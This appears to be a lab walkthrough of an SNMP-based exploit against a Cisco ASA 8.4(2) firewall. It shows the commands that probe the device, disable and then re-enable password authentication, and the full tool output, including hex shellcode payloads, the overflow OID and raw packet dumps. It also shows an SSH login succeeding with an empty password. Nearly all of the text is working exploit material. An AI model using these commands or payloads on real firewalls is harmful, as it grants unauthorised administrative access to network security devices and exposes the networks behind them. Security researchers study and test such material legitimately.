Normal ssh connection
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
Checking exploit support
#python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing: extrabacon_1.1.0.1.py info -t asa:161 -c cisco [+] probing target via snmp [+] Connecting to asa:161 **************************************** [+] response: ###[ SNMP ]### version = <ASN1_INTEGER[1L]> community = <ASN1_STRING['cisco']> \PDU \ |###[ SNMPresponse ]### | id = <ASN1_INTEGER[0L]> | error = <ASN1_INTEGER[0L]> | error_index= <ASN1_INTEGER[0L]> | \varbindlist\ | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.2.1.1.1.0']> | | value = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']> | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.2.1.1.3.0']> | | value = <ASN1_TIME_TICKS[363400L]> | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.2.1.1.5.0']> | | value = <ASN1_STRING['asa.lab.net']> [+] firewall uptime is 363400 time ticks, or 1:00:34 [+] firewall name is asa.lab.net [+] target is running asa842, which is supported Data stored in key file : asa842 Data stored in self.vinfo: ASA842
Launching the exploit (disabling passwords)
#python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing: extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable Data stored in self.vinfo: ASA842 [+] generating exploit for exec mode pass-disable [+] using shellcode in ./versions [+] importing version-specific shellcode shellcode_asa842 [+] building payload for mode pass-disable appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3 appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3 [+] random SNMP request-id 80055950 [+] fixing offset to payload 49 overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144 payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3 EXBA msg (369): 3082016d0201010405636973636fa582015f020404c58e8e0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500 [+] Connecting to asa:161 [+] packet 1 of 1 [+] 0000 30 82 01 6D 02 01 01 04 05 63 69 73 63 6F A5 82 0..m.....cisco.. [+] 0010 01 5F 02 04 04 C5 8E 8E 02 01 00 02 01 01 30 82 ._............0. [+] 0020 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .O0....+........ [+] 0030 85 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 ...........1...% [+] 0040 F6 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 A5 A5 ..1......1...... [+] 0050 31 FA CD 80 EB 14 BF F0 8F 53 09 31 C9 B1 04 FC 1........S.1.... [+] 0060 F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF FF 31 .......^.......1 [+] 0070 C0 40 C3 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB .@...........1.. [+] 0080 A5 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 ....1......1.... [+] 0090 A5 A5 31 FA CD 80 EB 14 BF E0 13 08 08 31 C9 B1 ..1..........1.. [+] 00a0 04 FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF .........^...... [+] 00b0 FF 31 C0 40 C3 C3 30 81 B8 06 81 B3 2B 06 01 04 .1.@..0.....+... [+] 00c0 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38 43 ....k......._.8C [+] 00d0 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03 81 {z.-5.%.%.%.%... [+] 00e0 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48 31 l....$...e...EH1 [+] 00f0 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E 81 .@1.[.3.1.v.?... [+] 0100 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25 81 *.*.*...w.%.%.%. [+] 0110 25 60 81 0B 81 04 24 81 60 01 00 00 04 31 81 7F %`....$.`....1.. [+] 0120 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10 81 .Pa.C........... [+] 0130 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................ [+] 0140 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................ [+] 0150 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47 14 ..............G. [+] 0160 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10 05 ...|$.......`... [+] 0170 00 . **************************************** [+] response: ###[ SNMP ]### version = <ASN1_INTEGER[1L]> community = <ASN1_STRING['cisco']> \PDU \ |###[ SNMPresponse ]### | id = <ASN1_INTEGER[80055950L]> | error = <ASN1_INTEGER[0L]> | error_index= <ASN1_INTEGER[0L]> | \varbindlist\ | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.2.1.1.1.0']> | | value = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']> | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']> | | value = <ASN1_STRING['']> [+] received SNMP id 80055950, matches random id sent, likely success [+] clean return detected
Ssh connection with password disabled
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa>enable
Password: <enter>
asa#exit
Launching the exploit (re-enabling passwords)
#python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing: extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable Data stored in self.vinfo: ASA842 [+] generating exploit for exec mode pass-enable [+] using shellcode in ./versions [+] importing version-specific shellcode shellcode_asa842 [+] building payload for mode pass-enable appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80 appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80 [+] random SNMP request-id 425184577 [+] fixing offset to payload 49 overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144 payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3 EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500 [+] Connecting to asa:161 [+] packet 1 of 1 [+] 0000 30 82 01 6D 02 01 01 04 05 63 69 73 63 6F A5 82 0..m.....cisco.. [+] 0010 01 5F 02 04 19 57 CD 41 02 01 00 02 01 01 30 82 ._...W.A......0. [+] 0020 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .O0....+........ [+] 0030 85 EB 14 BF F0 8F 53 09 31 C9 B1 04 FC F3 A4 E9 ......S.1....... [+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1.. [+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 F6 ..........1...%. [+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1 [+] 0070 FA CD 80 EB 14 BF E0 13 08 08 31 C9 B1 04 FC F3 ..........1..... [+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U. [+] 0090 E5 57 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 .W..........1... [+] 00a0 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 ...1......1..... [+] 00b0 A5 31 FA CD 80 C3 30 81 B8 06 81 B3 2B 06 01 04 .1....0.....+... [+] 00c0 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38 43 ....k......._.8C [+] 00d0 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03 81 {z.-5.%.%.%.%... [+] 00e0 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48 31 l....$...e...EH1 [+] 00f0 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E 81 .@1.[.3.1.v.?... [+] 0100 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25 81 *.*.*...w.%.%.%. [+] 0110 25 60 81 0B 81 04 24 81 60 01 00 00 04 31 81 7F %`....$.`....1.. [+] 0120 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10 81 .Pa.C........... [+] 0130 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................ [+] 0140 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................ [+] 0150 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47 14 ..............G. [+] 0160 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10 05 ...|$.......`... [+] 0170 00 . **************************************** [+] response: ###[ SNMP ]### version = <ASN1_INTEGER[1L]> community = <ASN1_STRING['cisco']> \PDU \ |###[ SNMPresponse ]### | id = <ASN1_INTEGER[425184577L]> | error = <ASN1_INTEGER[0L]> | error_index= <ASN1_INTEGER[0L]> | \varbindlist\ | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.2.1.1.1.0']> | | value = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']> | |###[ SNMPvarbind ]### | | oid = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']> | | value = <ASN1_STRING['']> [+] received SNMP id 425184577, matches random id sent, likely success [+] clean return detected
Normal ssh connection
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again. admin@asa's password:
References
https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/